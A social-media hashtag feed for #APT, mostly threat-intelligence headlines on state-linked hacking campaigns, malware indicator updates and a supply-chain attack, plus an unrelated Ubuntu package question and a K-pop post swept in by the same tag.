VulDB 13h ago
Improved indicators: NjRAT (+3), Tsunami (+1), XWorm (+1), ACR Stealer (+1), Xtreme RAT (+2), Remcos (+1) and SystemBC (+1). https://vuldb.com/actor #apt #cti #ioc
Actors

Predictive activity analysis of APT actors in social media, private forums, chat rooms, and darknet markets.

Vulnerability Database
TechNadu16h ago

DPRK campaign uses GitHub as C2 🚨
LNK files → PowerShell payload → data exfil via API

Trusted platform abuse = stealthy operations

https://www.technadu.com/dprk-phishing-campaigns-exploit-github-c2-to-target-users-in-south-korea/625004/

#Infosec #APT #ThreatIntel #Cybersecurity

CyberNetsecIO16h ago

📰 Iranian Hackers Launch Coordinated Password Spray Attacks on Middle East

🇮🇷 Iranian APT Gray Sandstorm linked to password spray attacks against Israel & UAE. The campaign, targeting M365 accounts, appears coordinated with kinetic military strikes to aid in damage assessment. #APT #Iran #CyberWarfare #PasswordSpray

🔗 https://cyber.netsecops.io/articles/iranian-hackers-launch-coordinated-password-spray-attacks-on-middle-east/?utm_source=mastodon&utm_medium=social&utm_campaign=twitter_auto

Iranian Hackers Launch Coordinated Password Spray Attacks on Middle East

The Iranian APT group Gray Sandstorm is suspected of conducting a large-scale password spray attack against Microsoft 365 accounts in Israel and the UAE to support kinetic military operations.

CyberNetSec.io
CyberNetsecIO16h ago

📰 Chinese APT Mustang Panda Renews Espionage Campaign Against European Governments

🇨🇳 Chinese APT Mustang Panda (TA416) is back, targeting European governments, EU & NATO missions with updated tactics. Campaigns use phishing links, abuse MSBuild, and deploy PlugX malware for espionage. #APT #MustangPanda #CyberSecurity #China

🔗 https://cyber.netsecops.io/articles/chinese-apt-mustang-panda-renews-espionage-campaign-against-european-governments/?utm_source=mastodon&ut…

Chinese APT Mustang Panda Renews Espionage Campaign Against European Governments

The Chinese APT group TA416 (Mustang Panda) has launched new cyber-espionage campaigns targeting European governments, using evolving tactics like MSBuild abuse to deliver PlugX malware.

CyberNetSec.io
AskUbuntu19h ago

apt update fails due to missing release file (Ubuntu 20.04) #apt #upgrade #updates

https://askubuntu.com/q/1565368/612

apt update fails due to missing release file (Ubuntu 20.04)

I am trying to upgrade an old linux machine from Ubuntu 20.04 to the latest LTS. I am being blocked by a single package failing to update. When upgrading via the Software Updater, the upgrade fails...

Ask Ubuntu
VulDB 1d ago
Indicators added for: DeerStealer (+2), RemcosRAT (+1), GuLoader (+2), Amnesia RAT (+1), Havoc (+1), Sliver (+2) and STRRAT (+1). https://vuldb.com/actor #apt #cti #ioc
Actors

Predictive activity analysis of APT actors in social media, private forums, chat rooms, and darknet markets.

Vulnerability Database
securityaffairs1d ago
#Google links #Axios #npm supply chain attack to #North #Korea-linked #APT #UNC1069
https://securityaffairs.com/190256/security/google-links-axios-npm-supply-chain-attack-to-north-korea-linked-apt-unc1069.html
#securityaffairs #hacking
Google links Axios npm supply chain attack to North Korea-linked APT UNC1069

Google links the Axios npm supply chain attack to North Korean threat group UNC1069, targeting financial gain.

Security Affairs
Habr1d ago

«Все работает, но БД утекает»: Как взлом подрядчика привел к eBPF-руткиту и утечке данных

Когда мы говорим об атаках через цепочку поставок, обычно всплывает в голове что-то монументальное - SolarWinds, взлом инфраструктуры гигантов. Но правда в том, что сегодня любой бизнес, который нанимает внешних админов или DevOps-инженеров, рискует заполучить зловреда, способного годами сидеть в периметре и сливать базы данных(БД). И вы об этом даже не узнаете… В этой статье - хочу поделиться реальным случаем из практики. Как взлом ноутбука подрядчика привел к внедрению eBPF-руткита в Linux. Раскрыть атаку помогла… ну, скажем так, случайная оплошность самих злоумышленников.

https://habr.com/ru/articles/1017934/

#APT #readteam #forensic_analysis

«Все работает, но БД утекает»: Как взлом подрядчика привел к eBPF-руткиту и утечке данных

Когда мы говорим об атаках через цепочку поставок, обычно всплывает в голове что-то монументальное - SolarWinds, взлом инфраструктуры гигантов. Но правда в том, что сегодня любой бизнес, который...

Хабр
VulDB 2d ago
Added some more indicators for: AsyncRAT (+1), TinyNuke (+1), APT28 (+3), HellsUchecker (+5), Void Manticore (+8), SafePay (+10) and CastleRAT (+1). https://vuldb.com/actor #apt #cti #ioc
Actors

Predictive activity analysis of APT actors in social media, private forums, chat rooms, and darknet markets.

Vulnerability Database
Kpop in Japan2d ago
https://www.wacoca.com/kpop/1482149/videos/2026-03-31/ When rosé pranked the audience🤣 #blackpink #shorts #rosé ##fyp ##shorts ##viralvideo #APT #BLACKPINK #blink #BTS #Jennie #Jisoo #KPOP女性アイドルランキング #KPOP #Lisa #Rose #subscribe #trending #youtube #ロゼ(ROSÉ) #韓国の女性メンバー人気No1は